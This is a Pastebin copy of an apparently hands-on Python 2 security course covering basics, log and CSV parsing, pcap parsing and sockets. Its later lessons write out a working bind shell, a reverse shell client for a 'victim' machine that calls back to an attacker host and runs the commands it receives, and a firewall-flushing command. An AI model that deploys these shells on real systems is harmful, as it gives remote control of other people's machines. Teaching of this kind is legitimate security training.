Advertisement
joemccray

Python 2019 Course Dev

May 23rd, 2018
3,042
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Python Quizzes:
  2. ---------------
  3. https://www.tutorialspoint.com/python/python_online_quiz.htm
  4. https://www.geeksforgeeks.org/python-gq/
  5. https://www.programiz.com/python-programming/quiz
  6. https://www.afterhoursprogramming.com/tutorial/python/python-quiz/
  7. https://www.sanfoundry.com/1000-python-questions-answers/
  8. http://www.mypythonquiz.com/
  9. http://www.techbeamers.com/python-programming-quiz-for-beginners-part-1/
  10.  
  11.  
  12.  
  13.  
  14. ####################
  15. # Installing Python#
  16. ####################
  17. Windows
  18. 32-Bit Version
  19. http://www.python.org/ftp/python/2.7.5/python-2.7.5.msi
  20.  
  21. 64-Bit Version
  22. http://www.python.org/ftp/python/2.7.5/python-2.7.5.amd64.msi
  23.  
  24. After you install Python in Windows the next thing you may want to install is IdleX:
  25. http://idlex.sourceforge.net/features.html
  26.  
  27. ---------------------------Type This-----------------------------------
  28.  
  29. Linux
  30. Debian/Ubuntu: sudo apt-get install -y python
  31. RHEL/CentOS/Fedora: sudo yum install -y python
  32.  
  33. -----------------------------------------------------------------------
  34.  
  35.  
  36. After you install Python in Linux the next thing that you will need to do is install idle.
  37.  
  38. ---------------------------Type This-----------------------------------
  39.  
  40. sudo apt-get install -y idle
  41.  
  42. -----------------------------------------------------------------------
  43.  
  44. Open IDLE, and let's just dive right in.
  45.  
  46.  
  47.  
  48.  
  49. ######################################
  50. # Python Lesson 1: Simple Printing #
  51. ######################################
  52.  
  53. ---------------------------Type This-----------------------------------
  54. $ python
  55.  
  56. >>> print "Today we are learning Python."
  57.  
  58. -----------------------------------------------------------------------
  59.  
  60.  
  61.  
  62.  
  63. ##############################################
  64. # Python Lesson 2: Simple Numbers and Math #
  65. ##############################################
  66.  
  67. ---------------------------Type This-----------------------------------
  68.  
  69. >>> 2+2
  70.  
  71. >>> 6-3
  72.  
  73. >>> 18/7
  74.  
  75. >>> 18.0/7
  76.  
  77. >>> 18.0/7.0
  78.  
  79. >>> 18/7
  80.  
  81. >>> 9%4
  82.  
  83. >>> 8%4
  84.  
  85. >>> 8.75%.5
  86.  
  87. >>> 6.*7
  88.  
  89. >>> 6*6*6
  90.  
  91. >>> 6**3
  92.  
  93. >>> 5**12
  94.  
  95. >>> -5**4
  96.  
  97.  
  98. -----------------------------------------------------------------------
  99.  
  100.  
  101.  
  102. ################################
  103. # Python Lesson 3: Variables #
  104. ################################
  105.  
  106. ---------------------------Type This-----------------------------------
  107.  
  108. >>> x=18
  109.  
  110. >>> x+15
  111.  
  112. >>> x**3
  113.  
  114. >>> y=54
  115.  
  116. >>> x+y
  117.  
  118. >>> g=input("Enter number here: ")
  119. 43
  120.  
  121. >>> g+32
  122.  
  123. >>> g**3
  124.  
  125.  
  126. -----------------------------------------------------------------------
  127.  
  128.  
  129.  
  130.  
  131.  
  132. ##########################################
  133. # Python Lesson 4: Modules and Functions #
  134. ##########################################
  135.  
  136. ---------------------------Type This-----------------------------------
  137.  
  138. >>> 5**4
  139.  
  140. >>> pow(5,4)
  141.  
  142. >>> abs(-18)
  143.  
  144. >>> abs(5)
  145.  
  146. >>> floor(18.7)
  147.  
  148. >>> import math
  149.  
  150. >>> math.floor(18.7)
  151.  
  152. >>> math.sqrt(81)
  153.  
  154. >>> joe = math.sqrt
  155.  
  156. >>> joe(9)
  157.  
  158. >>> joe=math.floor
  159.  
  160. >>> joe(19.8)
  161.  
  162.  
  163.  
  164. -----------------------------------------------------------------------
  165.  
  166.  
  167.  
  168. ############################
  169. # Python Lesson 5: Strings #
  170. ############################
  171.  
  172. ---------------------------Type This-----------------------------------
  173.  
  174.  
  175. >>> "XSS"
  176.  
  177. >>> 'SQLi'
  178.  
  179. >>> "Joe's a python lover"
  180.  
  181. >>> 'Joe\'s a python lover'
  182.  
  183. >>> "Joe said \"InfoSec is fun\" to me"
  184.  
  185. >>> a = "Joe"
  186.  
  187. >>> b = "McCray"
  188.  
  189. >>> a, b
  190.  
  191. >>> a+b
  192.  
  193.  
  194. -----------------------------------------------------------------------
  195.  
  196.  
  197.  
  198.  
  199.  
  200. #################################
  201. # Python Lesson 6: More Strings #
  202. #################################
  203.  
  204. ---------------------------Type This-----------------------------------
  205.  
  206.  
  207. >>> num = 10
  208.  
  209. >>> num + 2
  210.  
  211. >>> "The number of open ports found on this system is " + num
  212.  
  213. >>> num = str(18)
  214.  
  215. >>> "There are " + num + " vulnerabilities found in this environment."
  216.  
  217. >>> num2 = 46
  218.  
  219. >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
  220.  
  221.  
  222. -----------------------------------------------------------------------
  223.  
  224.  
  225.  
  226.  
  227.  
  228. ########################################
  229. # Python Lesson 7: Sequences and Lists #
  230. ########################################
  231.  
  232. ---------------------------Type This-----------------------------------
  233.  
  234. >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
  235.  
  236. >>> attacks
  237. ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
  238.  
  239. >>> attacks[3]
  240. 'SQL Injection'
  241.  
  242. >>> attacks[-2]
  243. 'Cross-Site Scripting'
  244.  
  245. >>> exit()
  246.  
  247. -----------------------------------------------------------------------
  248.  
  249.  
  250.  
  251.  
  252. ##################################
  253. # Level 8: Intro to Log Analysis #
  254. ##################################
  255.  
  256.  
  257. Log into your Linux host then execute the following commands:
  258. -----------------------------------------------------------------------
  259. NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt.
  260.  
  261.  
  262.  
  263. ---------------------------Type This-----------------------------------
  264.  
  265. wget http://pastebin.com/raw/85zZ5TZX
  266.  
  267. mv 85zZ5TZX access_log
  268.  
  269.  
  270. cat access_log | grep 141.101.80.188
  271.  
  272. cat access_log | grep 141.101.80.187
  273.  
  274. cat access_log | grep 108.162.216.204
  275.  
  276. cat access_log | grep 173.245.53.160
  277.  
  278. ----------------------------------------------------------------------
  279.  
  280.  
  281.  
  282.  
  283.  
  284. Google the following terms:
  285. - Python read file
  286. - Python read line
  287. - Python read from file
  288.  
  289.  
  290.  
  291.  
  292. ###############################################################
  293. # Python Lesson 9: Use Python to read in a file line by line #
  294. ###############################################################
  295.  
  296.  
  297. Reference:
  298. http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
  299.  
  300.  
  301.  
  302. ---------------------------Type This-----------------------------------
  303.  
  304. nano logread1.py
  305.  
  306.  
  307. ---------------------------Paste This-----------------------------------
  308. ## Open the file with read only permit
  309. f = open('access_log', "r")
  310.  
  311. ## use readlines to read all lines in the file
  312. ## The variable "lines" is a list containing all lines
  313. lines = f.readlines()
  314.  
  315. print lines
  316.  
  317.  
  318. ## close the file after reading the lines.
  319. f.close()
  320.  
  321. ----------------------------------------------------------------------
  322.  
  323.  
  324.  
  325.  
  326. ---------------------------Type This-----------------------------------
  327. python logread1.py
  328. ----------------------------------------------------------------------
  329.  
  330.  
  331.  
  332. Google the following:
  333. - python difference between readlines and readline
  334. - python readlines and readline
  335.  
  336.  
  337.  
  338.  
  339.  
  340.  
  341.  
  342.  
  343. ########################################
  344. #Python Lesson 10: A quick challenge #
  345. ########################################
  346.  
  347. Can you write an if/then statement that looks for this IP and print the log file line that contains the IP address?
  348.  
  349.  
  350. 141.101.81.187
  351.  
  352.  
  353.  
  354.  
  355.  
  356.  
  357. ---------------------------------------------------------
  358. Hint 1: Use Python to look for a value in a list
  359.  
  360. Reference:
  361. http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
  362.  
  363.  
  364.  
  365.  
  366. ---------------------------------------------------------
  367. Hint 2: Use Python to prompt for user input
  368.  
  369. Reference:
  370. http://www.cyberciti.biz/faq/python-raw_input-examples/
  371.  
  372.  
  373.  
  374.  
  375. ---------------------------------------------------------
  376. Hint 3: Use Python to search for a string in a list
  377.  
  378. Reference:
  379. http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
  380.  
  381.  
  382.  
  383.  
  384.  
  385. Here is my solution:
  386.  
  387. ---------------------------Type This-----------------------------------
  388.  
  389. $ python
  390. >>> f = open('access_log', "r")
  391. >>> lines = f.readlines()
  392. >>> ip = '141.101.81.187'
  393. >>> for string in lines:
  394. ... if ip in string:
  395. ... print(string)
  396.  
  397. ----------------------------------------------------------------------
  398.  
  399.  
  400. Here is one student's solution - can you please explain each line of this code to me?
  401.  
  402.  
  403. ---------------------------Type This-----------------------------------
  404. exit()
  405. nano ip_search.py
  406.  
  407. ---------------------------Paste This-----------------------------------
  408. #!/usr/bin/python
  409.  
  410. f = open('access_log')
  411.  
  412. strUsrinput = raw_input("Enter IP Address: ")
  413.  
  414. for line in iter(f):
  415. ip = line.split(" - ")[0]
  416. if ip == strUsrinput:
  417. print line
  418.  
  419. f.close()
  420.  
  421. ----------------------------------------------------------------------
  422.  
  423.  
  424.  
  425.  
  426. ---------------------------Type This-----------------------------------
  427. python ip_search.py
  428. ----------------------------------------------------------------------
  429.  
  430.  
  431.  
  432.  
  433.  
  434.  
  435.  
  436.  
  437. Working with another student after class we came up with another solution:
  438.  
  439. ---------------------------Type This-----------------------------------
  440. nano ip_search2.py
  441.  
  442. ---------------------------Paste This-----------------------------------
  443. #!/usr/bin/env python
  444.  
  445.  
  446. # This line opens the log file
  447. f=open('access_log',"r")
  448.  
  449. # This line takes each line in the log file and stores it as an element in the list
  450. lines = f.readlines()
  451.  
  452.  
  453. # This lines stores the IP that the user types as a var called userinput
  454. userinput = raw_input("Enter the IP you want to search for: ")
  455.  
  456.  
  457.  
  458. # This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
  459. for ip in lines:
  460. if ip.find(userinput) != -1:
  461. print ip
  462.  
  463. ----------------------------------------------------------------------
  464.  
  465.  
  466.  
  467. ---------------------------Type This-----------------------------------
  468. python ip_search2.py
  469. ----------------------------------------------------------------------
  470.  
  471.  
  472. #################################################
  473. # Lesson 14: Look for web attacks in a log file #
  474. #################################################
  475.  
  476. In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log.
  477. Supported attacks:
  478. 1. SQL Injection
  479. 2. Local File Inclusion
  480. 3. Remote File Inclusion
  481. 4. Cross-Site Scripting
  482.  
  483.  
  484. ---------------------------Type This-----------------------------------
  485.  
  486. wget https://s3.amazonaws.com/infosecaddictsfiles/scan_log.py
  487.  
  488. ----------------------------------------------------------------------
  489.  
  490. The usage for scan_log.py is simple. You feed it an apache log file.
  491.  
  492. ---------------------------Type This-----------------------------------
  493.  
  494. cat scan_log.py | less (use your up/down arrow keys to look through the file)
  495.  
  496. ----------------------------------------------------------------------
  497.  
  498. Explain to me how this script works.
  499.  
  500.  
  501.  
  502. ################################
  503. # Lesson 15: Parsing CSV Files #
  504. ################################
  505.  
  506. Dealing with csv files
  507.  
  508. Reference:
  509. http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/
  510.  
  511. Type the following commands:
  512. ---------------------------------------------------------------------------------------------------------
  513.  
  514. ---------------------------Type This-----------------------------------
  515.  
  516. wget https://s3.amazonaws.com/infosecaddictsfiles/class_nessus.csv
  517.  
  518. ----------------------------------------------------------------------
  519.  
  520. Example 1 - Reading CSV files
  521. -----------------------------
  522. #To be able to read csv formated files, we will first have to import the
  523. #csv module.
  524.  
  525.  
  526. ---------------------------Type This-----------------------------------
  527. python
  528. import csv
  529. with open('class_nessus.csv', 'rb') as f:
  530. reader = csv.reader(f)
  531. for row in reader:
  532. print row
  533.  
  534.  
  535. ----------------------------------------------------------------------
  536.  
  537.  
  538.  
  539.  
  540. Example 2 - Reading CSV files
  541. -----------------------------
  542.  
  543. ---------------------------Type This-----------------------------------
  544.  
  545. vi readcsv.py
  546.  
  547. ---------------------------Paste This-----------------------------------
  548. #!/usr/bin/python
  549. import csv # imports the csv module
  550. import sys # imports the sys module
  551.  
  552. f = open(sys.argv[1], 'rb') # opens the csv file
  553. try:
  554. reader = csv.reader(f) # creates the reader object
  555. for row in reader: # iterates the rows of the file in orders
  556. print row # prints each row
  557. finally:
  558. f.close() # closing
  559.  
  560.  
  561.  
  562. ----------------------------------------------------------------------
  563.  
  564.  
  565.  
  566. Ok, now let's run this thing.
  567.  
  568. --------------------------Type This-----------------------------------
  569. python readcsv.py
  570.  
  571. python readcsv.py class_nessus.csv
  572. ----------------------------------------------------------------------
  573.  
  574.  
  575.  
  576.  
  577.  
  578. Example 3 - - Reading CSV files
  579. -------------------------------
  580.  
  581. ---------------------------Type This-----------------------------------
  582.  
  583. vi readcsv2.py
  584.  
  585. ---------------------------Paste This-----------------------------------
  586. #!/usr/bin/python
  587. # This program will then read it and displays its contents.
  588.  
  589.  
  590. import csv
  591.  
  592. ifile = open('class_nessus.csv', "rb")
  593. reader = csv.reader(ifile)
  594.  
  595. rownum = 0
  596. for row in reader:
  597. # Save header row.
  598. if rownum == 0:
  599. header = row
  600. else:
  601. colnum = 0
  602. for col in row:
  603. print '%-8s: %s' % (header[colnum], col)
  604. colnum += 1
  605.  
  606. rownum += 1
  607.  
  608. ifile.close()
  609.  
  610.  
  611. ----------------------------------------------------------------------
  612.  
  613.  
  614.  
  615. ---------------------------Type This-----------------------------------
  616.  
  617. python readcsv2.py | less
  618.  
  619.  
  620. ----------------------------------------------------------------------
  621.  
  622.  
  623.  
  624.  
  625.  
  626. /---------------------------------------------------/
  627. --------------------PARSING CSV FILES----------------
  628. /---------------------------------------------------/
  629.  
  630. -------------TASK 1------------
  631.  
  632. ---------------------------Type This-----------------------------------
  633.  
  634. vi readcsv3.py
  635.  
  636. ---------------------------Paste This-----------------------------------
  637. #!/usr/bin/python
  638. import csv
  639. f = open('class_nessus.csv', 'rb')
  640. try:
  641. rownum = 0
  642. reader = csv.reader(f)
  643. for row in reader:
  644. #Save header row.
  645. if rownum == 0:
  646. header = row
  647. else:
  648. colnum = 0
  649. if row[3].lower() == 'high':
  650. print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
  651. rownum += 1
  652. finally:
  653. f.close()
  654.  
  655. -----------------------------------------------------------------------
  656.  
  657.  
  658. ---------------------------Type This-----------------------------------
  659.  
  660. python readcsv3.py | less
  661. -----------------------------------------------------------------------
  662.  
  663. -------------TASK 2------------
  664.  
  665. ---------------------------Type This-----------------------------------
  666.  
  667. vi readcsv4.py
  668. -----------------------------------------------------------------------
  669.  
  670. ---------------------------Paste This-----------------------------------
  671.  
  672. #!/usr/bin/python
  673. import csv
  674. f = open('class_nessus.csv', 'rb')
  675. try:
  676. print '/---------------------------------------------------/'
  677. rownum = 0
  678. hosts = {}
  679. reader = csv.reader(f)
  680. for row in reader:
  681. # Save header row.
  682. if rownum == 0:
  683. header = row
  684. else:
  685. colnum = 0
  686. if row[3].lower() == 'high' and row[4] not in hosts:
  687. hosts[row[4]] = row[4]
  688. print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
  689. rownum += 1
  690. finally:
  691. f.close()
  692.  
  693.  
  694. python readcsv4.py | less
  695.  
  696. ----------------------------------------------------------------------
  697.  
  698.  
  699.  
  700.  
  701.  
  702.  
  703.  
  704.  
  705. #################################################
  706. # Lesson 16: Parsing Packets with Python's DPKT #
  707. #################################################
  708. The first thing that you will need to do is install dpkt.
  709.  
  710. ---------------------------Type This-----------------------------------
  711.  
  712.  
  713. sudo apt-get install -y python-dpkt
  714.  
  715. ----------------------------------------------------------------------
  716.  
  717.  
  718.  
  719. Now cd to your courseware directory, and the cd into the subfolder '2-PCAP-Parsing/Resources'.
  720. Run tcpdump to capture a .pcap file that we will use for the next exercise
  721.  
  722. ---------------------------Type This-----------------------------------
  723.  
  724. sudo tcpdump -ni eth0 -s0 -w quick.pcap
  725.  
  726. ----------------------------------------------------------------------
  727.  
  728. --open another command prompt--
  729.  
  730. ---------------------------Type This-----------------------------------
  731.  
  732.  
  733. wget http://packetlife.net/media/library/12/tcpdump.pdf
  734.  
  735. ----------------------------------------------------------------------
  736.  
  737. Let's do something simple:
  738.  
  739. ---------------------------Type This-----------------------------------
  740.  
  741.  
  742. vi quickpcap.py
  743.  
  744. ---------------------------Paste This-----------------------------------
  745.  
  746. #!/usr/bin/python
  747. import dpkt;
  748.  
  749. # Simple script to read the timestamps in a pcap file
  750. # Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html
  751.  
  752. f = open("quick.pcap","rb")
  753. pcap = dpkt.pcap.Reader(f)
  754.  
  755. for ts, buf in pcap:
  756. print ts;
  757.  
  758. f.close();
  759.  
  760.  
  761. ----------------------------------------------------------------------
  762.  
  763.  
  764. Now let's run the script we just wrote
  765.  
  766. ---------------------------Type This-----------------------------------
  767.  
  768. python quickpcap.py
  769.  
  770. ----------------------------------------------------------------------
  771.  
  772.  
  773.  
  774. How dpkt breaks down a packet:
  775.  
  776. Reference:
  777. http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html
  778.  
  779. src: the MAC address of SOURCE.
  780. dst: The MAC address of DESTINATION
  781. type: The protocol type of contained ethernet payload.
  782.  
  783. The allowed values are listed in the file "ethernet.py",
  784. such as:
  785. a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.
  786. b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.
  787.  
  788.  
  789. References:
  790. http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python
  791.  
  792.  
  793.  
  794.  
  795.  
  796.  
  797. Ok - now let's have a look at pcapparsing.py
  798.  
  799. ---------------------------Type This-----------------------------------
  800.  
  801.  
  802. sudo tcpdump -ni eth0 -s0 -w capture-100.pcap
  803.  
  804. ----------------------------------------------------------------------
  805.  
  806. --open another command prompt--
  807.  
  808. ---------------------------Type This-----------------------------------
  809.  
  810.  
  811. wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
  812.  
  813. ----------------------------------------------------------------------
  814.  
  815.  
  816. Ok - now let's have a look at pcapparsing.py
  817.  
  818.  
  819. --------------------------------------------------------------
  820.  
  821.  
  822. import socket
  823. import dpkt
  824. import sys
  825. f = open('capture-100.pcap','r')
  826. pcapReader = dpkt.pcap.Reader(f)
  827.  
  828. for ts,data in pcapReader:
  829. ether = dpkt.ethernet.Ethernet(data)
  830. if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
  831. ip = ether.data
  832. tcp = ip.data
  833. src = socket.inet_ntoa(ip.src)
  834. srcport = tcp.sport
  835. dst = socket.inet_ntoa(ip.dst)
  836. dstport = tcp.dport
  837. print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)
  838.  
  839. f.close()
  840.  
  841. ----------------------------------------------------------------------
  842.  
  843.  
  844.  
  845. OK - let's run it:
  846.  
  847. ---------------------------Type This-----------------------------------
  848.  
  849. python pcapparsing.py
  850.  
  851. ----------------------------------------------------------------------
  852.  
  853.  
  854. running this script might throw an error like this:
  855.  
  856. Traceback (most recent call last):
  857. File "pcapparsing.py", line 9, in <module>
  858. if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
  859.  
  860.  
  861. If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)
  862.  
  863.  
  864.  
  865.  
  866. Your homework for today...
  867.  
  868.  
  869. Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
  870.  
  871.  
  872.  
  873.  
  874.  
  875.  
  876. Your challenge is to fix the Traceback error
  877.  
  878. ---------------------------Paste This-----------------------------------
  879.  
  880. #!/usr/bin/python
  881.  
  882. import pcapy
  883. import dpkt
  884. import sys
  885. import socket
  886. import struct
  887.  
  888. SINGLE_SHOT = False
  889.  
  890. # list all the network devices
  891. pcapy.findalldevs()
  892.  
  893. iface = "eth0"
  894. filter = "arp"
  895. max_bytes = 1024
  896. promiscuous = False
  897. read_timeout = 100 # in milliseconds
  898.  
  899. pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout )
  900. pc.setfilter( filter )
  901.  
  902. # callback for received packets
  903. def recv_pkts( hdr, data ):
  904. packet = dpkt.ethernet.Ethernet( data )
  905.  
  906. print type( packet.data )
  907. print "ipsrc: %s, ipdst: %s" %( \
  908. socket.inet_ntoa( packet.data.spa ), \
  909. socket.inet_ntoa( packet.data.tpa ) )
  910.  
  911. print "macsrc: %s, macdst: %s " % (
  912. "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha),
  913. "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) )
  914.  
  915. if SINGLE_SHOT:
  916. header, data = pc.next()
  917. sys.exit(0)
  918. else:
  919. packet_limit = -1 # infinite
  920. pc.loop( packet_limit, recv_pkts ) # capture packets
  921.  
  922. ----------------------------------------------------------------------
  923.  
  924. Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
  925.  
  926. Running the current version of the script may give you an error like this:
  927.  
  928. Traceback (most recent call last):
  929. File "pcapparsing.py", line 9, in <module>
  930. if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
  931.  
  932.  
  933. If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)
  934.  
  935. Your challenge task is to fix the Traceback error
  936.  
  937. #############################################
  938. # Lesson 17: Python Sockets & Port Scanning #
  939. #############################################
  940.  
  941. ---------------------------Type This-----------------------------------
  942.  
  943. $ sudo /sbin/iptables -F
  944.  
  945. $ ncat -l -v -p 1234
  946.  
  947. ----------------------------------------------------------------------
  948.  
  949.  
  950.  
  951. --open another terminal--
  952.  
  953. ---------------------------Type This-----------------------------------
  954.  
  955. python
  956.  
  957. >>> import socket
  958. >>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  959. >>> s.connect(('localhost', 1234))
  960. >>> s.send('Hello, world')
  961. >>> data = s.recv(1024)
  962. >>> s.close()
  963.  
  964. >>> print 'Received', data
  965.  
  966.  
  967. ----------------------------------------------------------------------
  968.  
  969.  
  970.  
  971.  
  972. ########################################
  973. # Lesson 18: TCP Client and TCP Server #
  974. ########################################
  975.  
  976. ---------------------------Type This-----------------------------------
  977.  
  978.  
  979. vi tcpclient.py
  980.  
  981. ---------------------------Paste This-----------------------------------
  982.  
  983.  
  984. #!/usr/bin/python
  985. # tcpclient.py
  986.  
  987. import socket
  988.  
  989. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  990. hostport = ("127.0.0.1", 1337)
  991. s.connect(hostport)
  992. s.send("Hello\n")
  993. buf = s.recv(1024)
  994. print "Received", buf
  995.  
  996.  
  997.  
  998. ----------------------------------------------------------------------
  999.  
  1000.  
  1001. ---------------------------Type This-----------------------------------
  1002.  
  1003.  
  1004.  
  1005.  
  1006. vi tcpserver.py
  1007.  
  1008.  
  1009. ---------------------------Paste This-----------------------------------
  1010.  
  1011.  
  1012. #!/usr/bin/python
  1013. # tcpserver.py
  1014.  
  1015. import socket
  1016.  
  1017. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1018. hostport = ("", 1337)
  1019. s.bind(hostport)
  1020. s.listen(10)
  1021. while 1:
  1022. cli,addr = s.accept()
  1023. print "Connection from", addr
  1024. buf = cli.recv(1024)
  1025. print "Received", buf
  1026. if buf == "Hello\n":
  1027. cli.send("Server ID 1\n")
  1028. cli.close()
  1029.  
  1030.  
  1031.  
  1032.  
  1033. ----------------------------------------------------------------------
  1034.  
  1035.  
  1036. ---------------------------Type This-----------------------------------
  1037.  
  1038.  
  1039. python tcpserver.py
  1040.  
  1041.  
  1042. --open another terminal--
  1043. python tcpclient.py
  1044.  
  1045. ----------------------------------------------------------------------
  1046.  
  1047. ########################################
  1048. # Lesson 19: UDP Client and UDP Server #
  1049. ########################################
  1050.  
  1051. ---------------------------Type This-----------------------------------
  1052.  
  1053. vi udpclient.py
  1054.  
  1055.  
  1056.  
  1057. ---------------------------Paste This-----------------------------------
  1058.  
  1059.  
  1060.  
  1061. #!/usr/bin/python
  1062. # udpclient.py
  1063.  
  1064. import socket
  1065.  
  1066. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  1067. hostport = ("127.0.0.1", 1337)
  1068. s.sendto("Hello\n", hostport)
  1069. buf = s.recv(1024)
  1070. print buf
  1071.  
  1072.  
  1073.  
  1074. ----------------------------------------------------------------------
  1075.  
  1076.  
  1077.  
  1078.  
  1079. ---------------------------Type This-----------------------------------
  1080.  
  1081.  
  1082. vi udpserver.py
  1083.  
  1084.  
  1085. ---------------------------Paste This-----------------------------------
  1086.  
  1087.  
  1088.  
  1089.  
  1090. #!/usr/bin/python
  1091. # udpserver.py
  1092.  
  1093. import socket
  1094.  
  1095. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  1096. hostport = ("127.0.0.1", 1337)
  1097. s.bind(hostport)
  1098. while 1:
  1099. buf, address = s.recvfrom(1024)
  1100. print buf
  1101. if buf == "Hello\n":
  1102. s.sendto("Server ID 1\n", address)
  1103.  
  1104.  
  1105. ----------------------------------------------------------------------
  1106.  
  1107.  
  1108. ---------------------------Type This-----------------------------------
  1109.  
  1110.  
  1111. python udpserver.py
  1112.  
  1113.  
  1114. --open another terminal--
  1115. python udpclient.py
  1116.  
  1117. ----------------------------------------------------------------------
  1118.  
  1119.  
  1120. ######################################
  1121. # Lesson 20: Bind and Reverse Shells #
  1122. ######################################
  1123.  
  1124. ---------------------------Type This-----------------------------------
  1125.  
  1126.  
  1127. vi simplebindshell.py
  1128.  
  1129. ---------------------------Paste This-----------------------------------
  1130.  
  1131. #!/bin/python
  1132. import os,sys,socket
  1133.  
  1134. ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
  1135. print '-Creating socket..'
  1136. port = 31337
  1137. try:
  1138. ls.bind(('', port))
  1139. print '-Binding the port on '
  1140. ls.listen(1)
  1141. print '-Listening, '
  1142. (conn, addr) = ls.accept()
  1143. print '-Waiting for connection...'
  1144. cli= conn.fileno()
  1145. print '-Redirecting shell...'
  1146. os.dup2(cli, 0)
  1147. print 'In, '
  1148. os.dup2(cli, 1)
  1149. print 'Out, '
  1150. os.dup2(cli, 2)
  1151. print 'Err'
  1152. print 'Done!'
  1153. arg0='/bin/sh'
  1154. arg1='-a'
  1155. args=[arg0]+[arg1]
  1156. os.execv(arg0, args)
  1157. except(socket.error):
  1158. print 'fail\n'
  1159. conn.close()
  1160. sys.exit(1)
  1161.  
  1162. ----------------------------------------------------------------------
  1163.  
  1164.  
  1165.  
  1166. ---------------------------Type This-----------------------------------
  1167.  
  1168. nc TARGETIP 31337
  1169.  
  1170. ----------------------------------------------------------------------
  1171.  
  1172.  
  1173. ---------------------
  1174. Preparing the target for a reverse shell
  1175.  
  1176. ---------------------------Type This-----------------------------------
  1177.  
  1178. $ ncat -lvp 4444
  1179.  
  1180. --open another terminal--
  1181. wget https://www.trustedsec.com/files/simple_py_shell.py
  1182.  
  1183. vi simple_py_shell.py
  1184.  
  1185.  
  1186.  
  1187. ----------------------------------------------------------------------
  1188.  
  1189.  
  1190.  
  1191. -------------------------------
  1192. Tricky shells
  1193.  
  1194. Reference:
  1195. http://securityweekly.com/2011/10/python-one-line-shell-code.html
  1196. http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
  1197.  
  1198.  
  1199.  
  1200.  
  1201. ###############################
  1202. # Reverse Shell in Python 2.7 #
  1203. ###############################
  1204.  
  1205. We'll create 2 python files. One for the server and one for the client.
  1206.  
  1207. - Below is the python code that is running on victim/client Windows machine:
  1208.  
  1209. ---------------------------Paste This-----------------------------------
  1210.  
  1211. # Client
  1212.  
  1213. import socket # For Building TCP Connection
  1214. import subprocess # To start the shell in the system
  1215.  
  1216. def connect():
  1217. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1218. s.connect(('192.168.243.150',8080))
  1219.  
  1220. while True: #keep receiving commands
  1221. command = s.recv(1024)
  1222.  
  1223. if 'terminate' in command:
  1224. s.close() #close the socket
  1225. break
  1226.  
  1227. else:
  1228.  
  1229. CMD = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  1230. s.send( CMD.stdout.read() ) # send the result
  1231. s.send( CMD.stderr.read() ) # incase you mistyped a command.
  1232. # we will send back the error
  1233.  
  1234. def main ():
  1235. connect()
  1236. main()
  1237.  
  1238.  
  1239. ----------------------------------------------------------------------
  1240.  
  1241. - Below is the code that we should run on server unit, in our case InfosecAddicts Ubuntu machine ( Ubuntu IP: 192.168.243.150 )
  1242.  
  1243. ---------------------------Paste This-----------------------------------
  1244.  
  1245. # Server
  1246.  
  1247. import socket # For Building TCP Connection
  1248.  
  1249.  
  1250. def connect ():
  1251.  
  1252. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1253. s.bind(("192.168.243.150", 8080))
  1254. s.listen(1)
  1255. conn, addr = s.accept()
  1256. print '[+] We got a connection from: ', addr
  1257.  
  1258.  
  1259. while True:
  1260. command = raw_input("Shell> ")
  1261.  
  1262. if 'terminate' in command:
  1263. conn.send('termminate')
  1264. conn.close() # close the connection with host
  1265. break
  1266.  
  1267. else:
  1268. conn.send(command) #send command
  1269. print conn.recv(1024)
  1270.  
  1271. def main ():
  1272. connect()
  1273. main()
  1274.  
  1275. ----------------------------------------------------------------------
  1276.  
  1277. - First run server.py code from Ubuntu machine. From command line type:
  1278.  
  1279. ---------------------------Type This-----------------------------------
  1280.  
  1281. python server.py
  1282.  
